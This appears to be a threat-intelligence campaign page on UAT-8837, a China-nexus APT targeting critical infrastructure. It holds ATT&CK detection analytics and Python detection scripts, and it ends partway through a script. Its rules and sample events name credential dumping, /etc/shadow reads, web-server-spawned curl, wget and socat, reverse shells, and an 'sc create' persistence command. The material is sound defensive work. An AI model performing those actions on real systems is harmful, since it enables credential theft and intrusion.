
UAT-8837 Critical Infrastructure Campaign in North America
Indicators of Compromise
No domains found for this campaign
APT Groups (1)
A China-nexus advanced persistent threat (APT) actor primarily focused on gaining initial access to high-value targets within critical infrastructure sectors. The group is characterized by its sophisticated use of zero-day vulnerabilities and its objective of harvesting sensitive organizational data, including source code and security configurations, potentially to facilitate future supply chain compromises.
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
REMEDIATION
T1033 - System Owner/User Discovery
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | Behavioral Detection of User Discovery via Local and Remote Enumeration | | Adversary launches built-in system tools (e.g., whoami, query user, net user) or scripts that enumerate user account information via local execution or remote API queries (e.g., WMI, PowerShell). |
| | | | Adversary runs commands like whoami, id, w, or cat /etc/passwd from non-interactive or scripting contexts to enumerate system user details. |
| | | | Adversary uses dscl, who, or environment variables like $USER to identify accounts or sessions via Terminal or malicious LaunchAgents. |
| | | | Adversary executes CLI commands like show users, show ssh, or attempts to dump AAA user lists from routers or switches. |
T1003 - OS Credential Dumping
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | Credential Dumping via Sensitive Memory and Registry Access Correlation | | Processes accessing LSASS memory or SAM registry hives outside of trusted security tools, often followed by file creation or lateral movement. Detects unauthorized access to sensitive OS subsystems for credential extraction. |
| | | | Processes opening /proc/[pid]/mem or /proc/[pid]/maps targeting credential-storing services like sshd or login. Behavior often includes high privilege escalation and memory inspection tools such as gcore or gdb. |
| | | | Unsigned processes accessing system memory or launching known credential scraping tools (e.g., osascript, dylib injections) to access the Keychain or sensitive memory regions. |
T1543 - Create or Modify System Process
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | Detection of System Process Creation or Modification Across Platforms | | Detects command-line or API-based creation/modification of Windows Services via sc.exe, powershell.exe, services.exe, or ChangeServiceConfig. Looks for creation/modification of autostart services via registry changes, file drops to System32\services, and anomalous parent-child process trees. |
| | | | Detects creation or modification of systemd service units, addition of cron jobs that invoke binaries on boot, or suspicious writes to /etc/init.d/. Monitors chmod +x and systemctl execution paths, especially from non-root parent processes. |
| | | | Detects creation or modification of LaunchDaemon or LaunchAgent plist files under /Library/LaunchDaemons/, ~/Library/LaunchAgents/, or similar. Monitors execution of launchctl, property list edits, and file permission changes. |
| | | | Detects creation of new container system processes via docker run --restart, kubectl exec to init containers, or modification of container init specs. Flags container images that override entrypoints to embed persistence behaviors. |
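The T1003 and T1543 analytics above share one correlation idea: a credential-store access by a process that is not a trusted security tool, followed within a short window by the creation of a service, unit, plist or restart-on-boot container on the same host. The script below is an added example (not part of this campaign page or its vendor's tooling) that implements that correlation over constructed EDR/auditd-style events. The allowlist, the persistence command patterns, the expected parent processes and the 30-minute window are assumptions chosen for illustration and would be tuned per estate.

```python
"""Correlate credential-store access (T1003) with follow-on persistence
creation (T1543) on the same host. All events are constructed samples."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class AccessEvent:      # e.g. Sysmon ProcessAccess, auditd open on /proc/<pid>/mem
    ts: datetime
    host: str
    actor: str          # image name of the process performing the access
    signed: bool        # code-signature status as reported by the sensor (assumed field)
    target: str         # "lsass.exe", "SAM", "/proc/<pid>/mem:sshd", "Keychain"


@dataclass
class PersistEvent:     # service/unit/plist creation observed by the sensor
    ts: datetime
    host: str
    user: str
    parent: str
    cmdline: str


CRED_TARGETS = {"lsass.exe", "sam", "security", "keychain"}
# Assumed allowlist of tools expected to touch LSASS/SAM on this estate (constructed).
ACCESS_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe", "lsass.exe", "services.exe"}
# Substrings that indicate service/unit/plist/container persistence across platforms.
PERSIST_PATTERNS = ("sc create", "sc config", "new-service", "set-service",
                    "systemctl enable", "/etc/systemd/system/", "/etc/init.d/",
                    "launchctl load", "launchctl bootstrap", "/library/launchdaemons/",
                    "/library/launchagents/", "docker run --restart", "crontab")
PRIVILEGED_USERS = {"root", "nt authority\\system", "system"}
EXPECTED_PARENTS = {"services.exe", "systemd", "launchd", "dpkg", "rpm", "apt", "yum", "msiexec.exe"}
CORRELATION_WINDOW = timedelta(minutes=30)


def is_credential_target(target):
    t = target.lower()
    return t in CRED_TARGETS or (t.startswith("/proc/") and ("/mem" in t or "/maps" in t))


def suspicious_access(ev):
    """Credential store touched by a process that is unsigned or not on the allowlist."""
    return is_credential_target(ev.target) and (ev.actor.lower() not in ACCESS_ALLOWLIST or not ev.signed)


def is_persistence(ev):
    c = ev.cmdline.lower()
    return any(p in c for p in PERSIST_PATTERNS)


def correlate(access_events, persist_events):
    """One alert per suspicious access; severity rises when persistence follows,
    and again when that persistence comes from an unexpected user or parent."""
    alerts = []
    for a in access_events:
        if not suspicious_access(a):
            continue
        follow = [p for p in persist_events
                  if p.host == a.host and is_persistence(p)
                  and timedelta(0) <= p.ts - a.ts <= CORRELATION_WINDOW]
        anomalous = [p for p in follow
                     if p.user.lower() not in PRIVILEGED_USERS
                     or p.parent.lower() not in EXPECTED_PARENTS]
        alerts.append({
            "host": a.host, "actor": a.actor, "target": a.target, "ts": a.ts.isoformat(),
            "techniques": ["T1003"] + (["T1543"] if follow else []),
            "persistence": [p.cmdline for p in follow],
            "severity": "critical" if anomalous else "high" if follow else "medium",
        })
    return alerts


# Constructed sample telemetry: one dump-then-persist chain, one allowlisted access,
# one Linux memory read with persistence outside the window, one benign package install.
T0 = datetime(2025, 1, 15, 1, 0)
SAMPLE_ACCESS = [
    AccessEvent(T0, "dc-02", "svchelper.exe", False, "lsass.exe"),
    AccessEvent(T0 + timedelta(minutes=1), "dc-02", "MsMpEng.exe", True, "lsass.exe"),
    AccessEvent(T0 + timedelta(hours=1), "build-07", "gcore", True, "/proc/4242/mem:sshd"),
]
SAMPLE_PERSIST = [
    PersistEvent(T0 + timedelta(minutes=5), "dc-02", "NT AUTHORITY\\SYSTEM", "cmd.exe",
                 'sc create WinSync binPath= "C:\\Windows\\Temp\\sync.exe" start= auto'),
    PersistEvent(T0 + timedelta(minutes=10), "web-05", "root", "dpkg", "systemctl enable nginx"),
    PersistEvent(T0 + timedelta(hours=2), "build-07", "root", "systemd", "systemctl enable backup.timer"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_ACCESS, SAMPLE_PERSIST):
        print(alert)
```

The severity ladder mirrors the table: a lone unexpected LSASS or /proc access is worth a medium-severity lead, the same access followed by a service creation is high, and a service created from cmd.exe (or by a non-root user on Linux/macOS) inside the window is the anomalous parent-child tree the analytic calls out.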
T1133 - External Remote Services
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | Behavior-chain detection for T1133 External Remote Services across Windows, Linux, macOS, Containers | | Unusual or unauthorized external remote access attempts (e.g., RDP, VPN, Citrix) → repeated failed logins followed by a successful session from uncommon geolocations or outside business hours → subsequent internal lateral movement or data exfiltration activities. |
| | | | Repeated SSH, VPN, or RDP gateway authentication attempts from external IPs → subsequent successful logon → remote shell or lateral movement activity (e.g., scp/sftp). |
| | | | Unexpected inbound or outbound VNC/SSH/Screen Sharing connections from external sources → repeated failed logins followed by success → remote interactive sessions or abnormal file transfers. |
| | | | Connections to exposed container services (e.g., Docker API, Kubernetes API server) from unauthorized external IPs → abnormal container creation/start → lateral activity within cluster nodes. |
T1069 - Permission Groups Discovery
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | | | Detection of adversary enumeration of domain or local group memberships via native tools such as net.exe, PowerShell, or WMI. This activity may precede lateral movement or privilege escalation. |
| | | | Detection of group enumeration using commands like 'id', 'groups', or 'getent group', often followed by privilege escalation or SSH lateral movement. |
| | | | Group membership checks via 'dscl', 'dscacheutil', or 'id', typically executed via terminal or automation scripts. |
T1082 - System Information Discovery
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | | | Process creation and command-line execution of native system discovery utilities such as systeminfo, hostname, wmic, or use of PowerShell/WMI for system enumeration. |
| | | | Execution of system enumeration commands such as uname, df, uptime, hostname, lscpu, and cat /etc/os-release through local terminal or scripts. |
| | | | Execution of system info utilities like systemsetup, sw_vers, uname, or sysctl by terminal or scripted processes. |
| | | | Execution of esxcli system hostname get, esxcli system version get, or esxcli hardware commands through SSH or local shell. |
| | | | Use of cloud API calls (e.g., AWS EC2 DescribeInstances, Azure VM Inventory) to enumerate system configurations across assets. |
| | | | Execution of show version, show hardware, or show system commands through CLI via SSH or console. |
T1190 - Exploit Public-Facing Application
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | | | Adversary sends crafted HTTP/S (or other service) input to an Internet-facing app (IIS/ASP.NET, API, device portal). Chain: (1) abnormal request patterns to public endpoint → (2) elevated 4xx/5xx or unusual methods/paths → (3) server process (w3wp.exe/other service) spawns shell/LOLbins or loads non-standard modules → (4) optional outbound callback from the host/container. |
| | | | Adversary exploits Apache/Nginx/app servers. Chain: (1) suspicious requests in access logs → (2) spike of 5xx or WAF blocks → (3) web server or interpreter (apache2/nginx/php-fpm/node/python) spawns /bin/sh, curl, wget, socat, or writes webshell → (4) outbound callback. |
| | | | Adversary targets macOS-hosted public services (e.g., nginx, node). Chain: suspicious inbound request → service crash/5xx → service spawns shell or writes file → new outbound connection. |
| | | | Adversary exploits containerized app via ingress or service. Chain: (1) suspicious request in ingress/app logs → (2) container process spawns a shell/exec/sidecar (kubectl exec/docker exec) → (3) egress to Internet or metadata service (169.254.169.254). |
| | | | Adversary targets cloud-hosted public endpoints. Chain: (1) ALB/ELB/Cloud LB logs show exploit-like inputs or error spikes → (2) workload spawns shell or reaches metadata API → (3) egress to new external hosts. |
| | | | Adversary exploits exposed OpenSLP on ESXi or vCenter public endpoints. Chain: inbound request pattern to mgmt service → hostd/vpxd error/crash/restart → unexpected process behavior or datastore access → outbound callback. |
| | | | Adversary exploits public admin services on routers/firewalls/switches. Chain: anomalous HTTP/SNMP/SmartInstall inputs → device syslog errors/restarts → config changes/CLI spawn → egress to attacker C2. |
T1558 - Steal or Forge Kerberos Tickets
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | | | Detects anomalous Kerberos activity such as forged or stolen tickets by correlating malformed fields in logon events, RC4-encrypted TGTs, or TGS requests without corresponding TGT requests. Also detects suspicious processes accessing LSASS memory for ticket extraction. |
| | | | Detects suspicious access to SSSD secrets database and Kerberos key material indicating ticket theft or replay attempts. Correlates anomalous file access with unusual Kerberos service ticket requests. |
| | | | Detects attempts to forge or replay Kerberos tickets by monitoring Unified Logs for anomalous kinit/klist activity and correlating unusual authentication sequences. |
T1550 - Use Alternate Authentication Material
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | Behavioral Detection Strategy for Use Alternate Authentication Material (T1550) | | Use of stolen Kerberos tickets or token impersonation resulting in logon sessions from accounts without expected interactive logon events. |
| | | | Access tokens or SSH keys used without corresponding login shell or PAM module activity, particularly for remote execution. |
| | | | Token replay or impersonation in federated logins without interactive browser session or MFA prompts. |
| | | | Unusual reuse of OAuth access tokens from different geographic regions, without full login events. |
| | | | Container process uses mounted cloud credentials or token cache to authenticate without known orchestration. |
| | | | Access token reuse to connect to SharePoint or Outlook APIs without interactive user context. |
| | | | Use of instance metadata tokens across instances or misuse of short-lived tokens issued for different roles. |
T1021 - Remote Services
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | Behavioral Detection Strategy for Remote Service Logins and Post-Access Activity | | Logon via RDP or WMI by a user account followed by uncommon command execution, file manipulation, or lateral network connections. |
| | | | SSH session from new source IP followed by interactive shell or privilege escalation (e.g., sudo, su) and outbound lateral connection. |
| | | | Remote login via ARD or SSH followed by screensharingd process activity or modification of TCC-protected files. |
| | | | Use of cloud-based bastion or VM console session followed by commands that initiate outbound SSH or RDP sessions from the cloud instance to other environments. |
| | | | vSphere API logins (vimService) or SSH to ESXi host followed by unauthorized shell commands or lateral remote logins from the ESXi host. |
T1016 - System Network Configuration Discovery
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | Behavioral Detection of System Network Configuration Discovery | | Execution of built-in tools (e.g., ipconfig, route, netsh) or PowerShell/WMI queries to enumerate IP, MAC, interface status, or routing configuration. |
| | | | Execution of ifconfig, ip a, or access to /proc/net/ indicating collection of local interface and route configuration. |
| | | | Execution of ifconfig, networksetup, or system_profiler to query IP/MAC/interface configuration and status. |
| | | | Use of esxcli network commands (e.g., esxcli network nic list, esxcli network ip interface ipv4 get) via SSH or hostd to enumerate adapter and IP information. |
| | | | CLI-based execution of interface and routing discovery commands (e.g., show ip interface, show arp, show route) over Telnet, SSH, or console. |
T1087 - Account Discovery
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | | | Detection of suspicious enumeration of local or domain accounts via command-line tools, WMI, or scripts. |
| | | | Enumeration of users and groups through suspicious shell commands or unauthorized access to /etc/passwd or /etc/shadow. |
| | | | Detection of user account enumeration through tools like dscl, dscacheutil, or login shell enumeration via command line. |
| | | | Detection of API calls listing users, IAM roles, or groups in cloud environments. |
| | | | Enumeration of user or role objects via IdP API endpoints or LDAP queries. |
| | | | Account enumeration via esxcli, vim-cmd, or API calls to vSphere. |
| | | | Account enumeration via bulk access to user directory features or hidden APIs. |
| | | | Account discovery via VBA macros, COM objects, or embedded scripting. |
T1083 - File and Directory Discovery
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | Recursive Enumeration of Files and Directories Across Privilege Contexts | | Execution of file enumeration commands (e.g., 'dir', 'tree') from non-standard processes or unusual user contexts, followed by recursive directory traversal or access to sensitive locations. |
| | | | Use of file enumeration commands (e.g., 'ls', 'find', 'locate') executed by suspicious users or scripts accessing broad file hierarchies or restricted directories. |
| | | | Execution of file or directory discovery commands (e.g., 'ls', 'find') from terminal or script-based tooling, especially outside normal user workflows. |
| | | | Execution of esxcli commands to enumerate datastore, configuration files, or directory structures by unauthorized or remote users. |
| | | | Execution of file discovery commands (e.g., 'dir', 'show flash', 'nvram:') from CLI interfaces, especially by unauthorized users or from abnormal source IPs. |
T1049 - System Network Connections Discovery
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | Detection of System Network Connections Discovery Across Platforms | | Detects usage of commands or binaries (e.g., netstat, PowerShell Get-NetTCPConnection) and WMI or API calls to enumerate local or remote network connections. |
| | | | Detects use of netstat, ss, lsof, or custom shell scripts to list current network connections. Often paired with privilege escalation or staging. |
| | | | Detects shell-based enumeration of active connections using netstat, lsof -i, or AppleScript-based system discovery. |
| | | | Detects shell or API usage of esxcli network ip connection list or netstat to enumerate ESXi host connections. |
| | | | Detects interactive or automated use of CLI commands like show ip sockets, show tcp brief, or SNMP queries for active sessions on routers/switches. |
| | | | Detects enumeration of cloud network interfaces, VPCs, subnets, or peer connections using CLI or SDKs (e.g., AWS CLI, Azure CLI, GCloud CLI). |
T1057 - Process Discovery
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | | | Identifies adversary behavior that launches commands or invokes APIs to enumerate active processes (e.g., tasklist.exe, Get-Process, or CreateToolhelp32Snapshot). Detects execution combined with parent process lineage, network session context, or remote origin. |
| | | | Detects execution of common process enumeration utilities (e.g., ps, top, htop) or access to /proc with suspicious ancestry. Correlates command usage with interactive shell context and user role. |
| | | | Monitors execution of ps, top, or launchctl with unusual parent processes or from terminal scripts. Also detects AppleScript-based process listing or system_profiler SPApplicationsDataType misuse. |
| | | | Detects process enumeration using esxcli system process list or ps on ESXi shell or via unauthorized SSH sessions. Correlates with interactive sessions and abnormal user roles. |
| | | | Monitors CLI-based execution of show process or equivalent on routers/switches. Correlates unusual device access, unauthorized roles, or config mode changes. |
T1098 - Account Manipulation
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | | | Account attribute changes (e.g., password set, group membership, servicePrincipalName, logon hours) correlated with unusual process lineage or timing, indicating privilege escalation or persistence via valid accounts. |
| | | | Use of native tools or scripting (e.g., usermod, passwd, groupmod) to escalate permissions or persist access on existing users, correlated with login or process events. |
| | | | Modifications to user accounts via dscl, pwpolicy, or System Preferences CLI (sysadminctl) that alter user groups, enable root, or bypass MDM restrictions. |
| | | | Modifications to SSO/SAML user attributes (e.g., isAdmin, role, MFA bypass, App assignments) often through CLI, API, or rogue IdP apps. |
| | | | Addition of new users or changes to role permissions (e.g., ReadOnly → Admin) via API or vSphere Client, particularly from non-jumpbox IPs. |
| | | | Role escalation (e.g., Editor → Owner) in cloud collaboration tools (Google Workspace, O365) or file sharing apps to maintain elevated access. |
T1078 - Valid Accounts
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | | | Detection of compromised or misused valid accounts via anomalous logon patterns, abnormal logon types, and inconsistent geographic or time-based activity across Windows endpoints. |
| | | | Detection of valid account misuse through SSH logins, sudo/su abuse, and service account anomalies outside expected patterns. |
| | | | Detection of interactive and remote logins by service accounts or users at unusual times, with unexpected child process activity. |
| | | | Detection of valid account abuse in IdP logs via geographic anomalies, impossible travel, risky sign-ins, and multiple MFA attempts or failures. |
| | | | Detection of containerized service accounts or compromised kubeconfigs being used for cluster access from unexpected nodes or IPs. |
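The T1133, T1021 and T1078 analytics above describe the same behavior chain from three angles: a burst of failed remote logins, a success from an uncommon source or at an uncommon hour, and then privilege escalation or onward connections in the resulting session. The script below is an added example (not part of this campaign page or its vendor's tooling) that scores that chain over constructed SSH/VPN/RDP-gateway authentication records and shell-command records. The trusted address ranges, business-hours window, thresholds and the list of escalation/movement commands are assumptions for illustration and would be tuned to the estate.

```python
"""Detect the remote-access chain behind T1133 / T1021 / T1078: failed-login
burst -> success from an uncommon source or time -> escalation or onward
movement in the same session. All events are constructed samples."""
import ipaddress
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class AuthEvent:
    ts: datetime
    host: str
    user: str
    src_ip: str
    service: str    # e.g. "sshd", "rdp-gateway", "vpn"
    outcome: str    # "failure" or "success"


@dataclass
class CmdEvent:
    ts: datetime
    host: str
    user: str
    cmd: str


# Assumed (constructed) tuning values for the estate being monitored.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]
BUSINESS_HOURS = range(8, 18)          # 08:00-17:59 local time
FAIL_THRESHOLD = 3                     # failures that make the preceding burst notable
FAIL_WINDOW = timedelta(minutes=10)    # look-back for failures before the success
FOLLOW_WINDOW = timedelta(minutes=30)  # look-ahead for post-logon activity
# First tokens that indicate escalation (sudo/su) or onward movement (ssh/scp/sftp/RDP clients).
SUSPICIOUS_CMD = {"sudo", "su", "ssh", "scp", "sftp", "xfreerdp", "mstsc", "psexec"}


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in TRUSTED_NETS)


def detect_chain(auth_events, cmd_events):
    """One alert per successful logon that is preceded by a failure burst, comes
    from outside trusted ranges, or lands outside business hours; each alert lists
    the suspicious commands that user then ran on that host."""
    alerts = []
    auth = sorted(auth_events, key=lambda e: e.ts)
    cmds = sorted(cmd_events, key=lambda c: c.ts)
    for i, ev in enumerate(auth):
        if ev.outcome != "success":
            continue
        prior_fails = [p for p in auth[:i]
                       if p.outcome == "failure" and p.src_ip == ev.src_ip
                       and p.host == ev.host and ev.ts - p.ts <= FAIL_WINDOW]
        reasons = []
        if len(prior_fails) >= FAIL_THRESHOLD:
            reasons.append(f"{len(prior_fails)} failed logins in the prior {FAIL_WINDOW}")
        if is_external(ev.src_ip):
            reasons.append("external source")
        if ev.ts.hour not in BUSINESS_HOURS:
            reasons.append("outside business hours")
        if not reasons:
            continue
        follow_on = [c.cmd for c in cmds
                     if c.host == ev.host and c.user == ev.user
                     and timedelta(0) <= c.ts - ev.ts <= FOLLOW_WINDOW
                     and (c.cmd.split() or [""])[0] in SUSPICIOUS_CMD]
        # Each anomaly on the logon counts one; observed follow-on activity counts two.
        score = len(reasons) + (2 if follow_on else 0)
        alerts.append({
            "host": ev.host, "user": ev.user, "src_ip": ev.src_ip, "service": ev.service,
            "ts": ev.ts.isoformat(), "reasons": reasons, "follow_on": follow_on,
            "severity": "high" if score >= 3 else "medium" if score == 2 else "low",
        })
    return alerts


# Constructed sample telemetry: a service account brute-forced from an external
# address at 02:00 and then escalating, next to a normal daytime admin session.
T0 = datetime(2025, 1, 15, 2, 1)
SAMPLE_AUTH = [
    *(AuthEvent(T0 + timedelta(minutes=m), "vpn-gw-01", "svc_backup", "198.51.100.7", "sshd", "failure")
      for m in range(4)),
    AuthEvent(T0 + timedelta(minutes=5), "vpn-gw-01", "svc_backup", "198.51.100.7", "sshd", "success"),
    AuthEvent(T0 + timedelta(hours=8), "vpn-gw-01", "alice", "10.0.1.5", "sshd", "success"),
]
SAMPLE_CMDS = [
    CmdEvent(T0 + timedelta(minutes=7), "vpn-gw-01", "svc_backup", "sudo -i"),
    CmdEvent(T0 + timedelta(minutes=11), "vpn-gw-01", "svc_backup", "ssh 10.0.5.20"),
    CmdEvent(T0 + timedelta(hours=8, minutes=1), "vpn-gw-01", "alice", "ls -la /var/log"),
]

if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_AUTH, SAMPLE_CMDS):
        print(alert)
```

Only the success event opens an alert; the failure burst, source reputation and hour are enrichments on it, which keeps one finding per session rather than one per failed attempt. The same function works for RDP-gateway or VPN records once they are normalised into AuthEvent, which is what the table's "across Windows, Linux, macOS, Containers" name implies.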
T1505 - Server Software Component
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | | | Installation of malicious IIS/Apache/SQL server modules that later execute command-line interpreters or establish outbound connections. |
| | | | Abuse of extensible server modules (e.g., Apache, Nginx, Tomcat) to load rogue plugins that initiate bash, connect to C2, or spawn reverse shells. |
| | | | Malicious use of webserver plugins (e.g., for nginx, PHP, Node.js) that execute AppleScript or open network sockets. |
| | | | Use of ESXi web interface plugins or vSphere extensions to embed persistent malicious scripts or services. |
T1018 - Remote System Discovery
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | | | Execution of network enumeration utilities (e.g., net.exe, ping.exe, tracert.exe) in short succession, often chained with lateral movement tools or system enumeration commands. |
| | | | Use of bash scripts or interactive shells to issue sequential ping, arp, or traceroute commands to map remote hosts. |
| | | | Execution of built-in or AppleScript-based system enumeration via arp, netstat, ping, and discovery of /etc/hosts contents. |
| | | | ESXi shell or SSH access issuing esxcli network diag ping or viewing routing tables to identify connected hosts. |
| | | | Execution of discovery commands like show cdp neighbors, show arp, and other interface-level introspection on Cisco or Juniper devices. |
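The discovery tables on this page (T1033, T1069, T1082, T1016, T1087, T1083, T1049, T1057 and T1018) all reduce to the same detection: native enumeration commands on Windows, Linux, macOS, ESXi and network-device CLIs, weighted by whether they run from a scripting or service parent and whether several distinct discovery techniques appear in a short window. The script below is an added example (not part of this campaign page or its vendor's tooling) that classifies constructed process-creation events against the commands listed in those tables and clusters them per host and user. The regex table, the 15-minute window, the three-technique threshold and the list of script-style parent processes are assumptions chosen for illustration.

```python
"""Cluster discovery commands from process-creation telemetry and alert when
several distinct discovery techniques run for one host/user inside a window.
Sample events are constructed, not real telemetry."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    user: str
    parent: str      # parent process image name, e.g. "php-fpm", "explorer"
    cmdline: str


# Ordered (regex, technique) pairs over a normalised, lowercased command line;
# first match wins, so more specific patterns come first. Commands are the
# ones named in the analytic descriptions above.
DISCOVERY = [
    (r"^(net\s+user\s+/domain|dscl\s+\S+\s+-?list\s+/users|cat\s+/etc/(passwd|shadow)|getent\s+passwd|aws\s+iam\s+list-users)\b", "T1087"),
    (r"^(net\s+(local)?group|groups|getent\s+group|dscacheutil\s+-q\s+group)\b", "T1069"),
    (r"^(whoami|id|w|quser|query\s+user|net\s+user|logname)\b", "T1033"),
    (r"^(ping|arp|tracert|traceroute|show\s+cdp\s+neighbors|net\s+view|esxcli\s+network\s+diag\s+ping)\b", "T1018"),
    (r"^(ipconfig|ifconfig|ip\s+a(ddr)?|route|netsh\s+interface|networksetup|esxcli\s+network\s+(nic|ip\s+interface)|show\s+(ip\s+interface|arp|route))\b", "T1016"),
    (r"^(netstat|ss|lsof\s+-i|get-nettcpconnection|esxcli\s+network\s+ip\s+connection|show\s+(ip\s+sockets|tcp\s+brief))\b", "T1049"),
    (r"^(tasklist|get-process|ps|top|htop|show\s+process(es)?|esxcli\s+system\s+process)\b", "T1057"),
    (r"^(systeminfo|hostname|uname|sw_vers|lscpu|uptime|df|cat\s+/etc/os-release|sysctl|systemsetup|show\s+(version|hardware|system)|esxcli\s+system\s+(hostname|version)|wmic\s+(os|computersystem))\b", "T1082"),
    (r"^(dir|tree|ls|find|locate|show\s+flash)\b", "T1083"),
]
WINDOW = timedelta(minutes=15)
MIN_TECHNIQUES = 3
# Parents from which discovery should not normally originate (web workers, schedulers, script hosts).
SCRIPT_PARENTS = {"w3wp", "php-fpm", "apache2", "httpd", "nginx", "node", "cron", "wscript", "cscript", "mshta"}


def normalise(cmdline):
    """Lowercase, drop quotes and leading paths, unwrap 'powershell -nop -c <cmd>', drop .exe."""
    cmd = cmdline.strip().lower().replace('"', "")
    cmd = re.sub(r"^(?:[a-z]:\\[^\s]*\\|/\S*/)", "", cmd)
    cmd = re.sub(r"^(?:powershell|pwsh)(?:\.exe)?\s+(?:-\S+\s+)*", "", cmd)
    return re.sub(r"^(\S+?)\.exe\b", r"\1", cmd).strip("'")


def classify(cmdline):
    cmd = normalise(cmdline)
    for pattern, technique in DISCOVERY:
        if re.match(pattern, cmd):
            return technique
    return None


def detect_discovery_clusters(events):
    """Per (host, user), find the WINDOW with the most distinct techniques and
    alert when it reaches MIN_TECHNIQUES; severity is high if any command in the
    cluster came from a script-style parent."""
    groups = defaultdict(list)
    for ev in events:
        technique = classify(ev.cmdline)
        if technique:
            groups[(ev.host, ev.user)].append((ev, technique))
    alerts = []
    for (host, user), hits in groups.items():
        hits.sort(key=lambda h: h[0].ts)
        best = []
        for i, (start, _) in enumerate(hits):
            window = [h for h in hits[i:] if h[0].ts - start.ts <= WINDOW]
            if len({t for _, t in window}) > len({t for _, t in best}):
                best = window
        techniques = sorted({t for _, t in best})
        if len(techniques) < MIN_TECHNIQUES:
            continue
        scripted = any(ev.parent.lower() in SCRIPT_PARENTS for ev, _ in best)
        alerts.append({"host": host, "user": user, "techniques": techniques,
                       "commands": [ev.cmdline for ev, _ in best],
                       "severity": "high" if scripted else "medium"})
    return alerts


# Constructed sample events: a PHP worker enumerating its host, an engineer on a
# switch CLI, and a workstation user with two isolated commands (below threshold).
T0 = datetime(2025, 1, 15, 3, 12)
SAMPLE_EVENTS = [
    ProcEvent(T0, "hr-app-01", "www-data", "php-fpm", "/usr/bin/id"),
    ProcEvent(T0 + timedelta(seconds=5), "hr-app-01", "www-data", "php-fpm", "uname -a"),
    ProcEvent(T0 + timedelta(seconds=9), "hr-app-01", "www-data", "php-fpm", "cat /etc/os-release"),
    ProcEvent(T0 + timedelta(seconds=20), "hr-app-01", "www-data", "php-fpm", "ip a"),
    ProcEvent(T0 + timedelta(seconds=31), "hr-app-01", "www-data", "php-fpm", "netstat -tulpn"),
    ProcEvent(T0 + timedelta(minutes=2), "hr-app-01", "www-data", "php-fpm", "find / -name *.conf"),
    ProcEvent(T0 + timedelta(hours=6), "core-sw-01", "netops", "cli", "show version"),
    ProcEvent(T0 + timedelta(hours=6, seconds=15), "core-sw-01", "netops", "cli", "show cdp neighbors"),
    ProcEvent(T0 + timedelta(hours=6, seconds=40), "core-sw-01", "netops", "cli", "show ip interface brief"),
    ProcEvent(T0 + timedelta(hours=7), "ws-042", "alice", "explorer", r'"C:\Windows\System32\whoami.exe" /all'),
    ProcEvent(T0 + timedelta(hours=7, minutes=40), "ws-042", "alice", "explorer", "powershell.exe -nop -c Get-Process"),
]

if __name__ == "__main__":
    for alert in detect_discovery_clusters(SAMPLE_EVENTS):
        print(alert)
```

Counting distinct techniques rather than raw commands is what separates a web worker running id, uname, ip, netstat and find in thirty seconds from an administrator who runs whoami once; the switch-CLI session still scores medium, which is the intended behavior for the "unauthorized roles or abnormal source IPs" qualifier the device-oriented rows add.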
T1105 - Ingress Tool Transfer
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| | | | Unusual or uncommon processes initiate network connections to external destinations followed by file creation (tools downloaded). |
| | | | Shell-based tools (curl, wget, scp) initiate connections to external domains followed by creation of executable files on disk. |
| | | | Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories. |
| | | | Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories. |
| | | | Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks. |
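The T1190 chains earlier on this page end where the T1105 rows begin: a web-server process spawns a shell or download tool, that process tree reaches an external host or the instance metadata service, and a file is written to a staging directory. The script below is an added example (not part of this campaign page or its vendor's tooling) that joins constructed access-log lines with process, network and file events for one host and reports both techniques when the whole chain is present. The web-server and LOLBin image names, the staging directories, the error-burst threshold and the 10-minute window are assumptions for illustration; the access-log parser handles the Apache/Nginx combined format.

```python
"""Correlate the T1190 exploitation chain with T1105 ingress tool transfer on a
web host: 4xx/5xx burst -> web-server process spawns a shell or LOLBin -> the
process tree calls an external or metadata address -> a file lands in a
staging directory. All events below are constructed samples."""
import ipaddress
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class NetEvent:
    ts: datetime
    host: str
    pid: int
    dst_ip: str
    dst_port: int


@dataclass
class FileEvent:
    ts: datetime
    host: str
    pid: int
    path: str


# Assumed (constructed) tuning values.
WEB_SERVERS = {"w3wp", "apache2", "httpd", "nginx", "php-fpm", "node", "python3", "tomcat", "java"}
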